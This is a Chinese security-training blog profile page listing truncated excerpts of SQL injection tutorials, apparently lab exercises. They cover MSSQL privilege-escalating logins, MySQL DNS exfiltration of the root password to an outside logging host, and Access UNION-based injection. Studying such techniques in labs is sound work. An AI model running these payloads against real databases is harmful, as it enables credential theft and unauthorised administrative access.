Track 实习学员

crustsalt

0关注
0粉丝
30文章
返回网站首页

您已发布 30篇文章作品写文章

MSSQL注入 - 反弹注入

反弹注入关键是opendatasource函数首先在服务器中建立账户exec master.dbo.sp_addlogin username,password;--需要把账户加入管理员组exec master.dbo.sp_addsrvrolemember username,sysadmin;--然后需要创建一个库create database 库名;--创建与靶场相同的字段数在url后加&#39

 2018-11-6
 0 
 9 

MYSQL 注入 - Dns注入

首先注册一个ceye账号 然后配置成如图之后查看mysql的注入模板SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port

 2018-11-4
 0 
 14 

4.1 Access注入 — 偏移注入

找到位于产品站式的注入点,用order by 判断出有26个字段,其后用cookies注入 使用union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+admin发现有三个可以显示的点 3,5,7和图片地址src的25使用admin.* 发现union select 1,2,adm

 2018-11-2
 0 
 20 

3.6、正则表达式【作业】

<?php$sh=fopen("sharedStrings.xml","r");$sh1=fread($sh, filesize("sharedStrings.xml"));$sh1=preg_replace('/<phoneticPr type="noConversion" fontId=&quo

 2018-11-2
 0 
 16